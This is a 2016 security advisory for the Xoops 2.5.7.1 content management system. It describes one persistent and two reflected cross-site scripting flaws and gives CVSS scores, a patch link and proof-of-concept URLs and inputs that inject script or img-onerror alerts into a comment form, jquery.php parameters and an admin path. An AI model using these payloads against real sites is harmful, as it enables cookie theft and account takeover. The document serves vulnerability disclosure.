Xoops 2.5.7.1: XSS

Date: 2016-01-28 09:47:11

1. Introduction

2. Overview

Xoops is a content management system written in PHP. In version 2.5.7.1, it is vulnerable to reflected and persistent XSS.

The vulnerability can lead to the stealing of cookies, injection of JavaScript keyloggers, or the bypassing of CSRF protection.

3. Details

Persistent XSS

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: Comment messages are echoed unencoded leading to persistent XSS. A user account is needed, but registration is open by default.

Proof of Concept:

0. Register (registration is open by default) 1. Leave a Comment, as Message use '">xss<img src=no onerror=alert(1)> 2. Visit the comment overview to trigger the XSS: http://localhost/xoops-2.5.7.1/htdocs/modules/system/admin.php?fct=comments

Reflected XSS 1

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The path_file and file parameters of the jquery.php script are vulnerable to reflected XSS.

Proof of Concept:

http://localhost/xoops-2.5.7.1/htdocs/modules/system/admin/tplsets/jquery.php?op=tpls_edit_file&path_file="><script>alert(2)</script>&file="><script>alert(2)</script>

Reflected XSS 2

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The URL is echoed unencoded when viewing users in the admin area, leading to reflected XSS.

Proof of Concept:

http://localhost/xoops-2.5.7.1/htdocs/modules/system/admin.php/'><script>alert(1)</script>?fct=users

4. Solution

To mitigate this issue please apply the security patch:

http://xoops.org/modules/news/article.php?storyid=6747

Please note that a newer version might already be available.

5. Report Timeline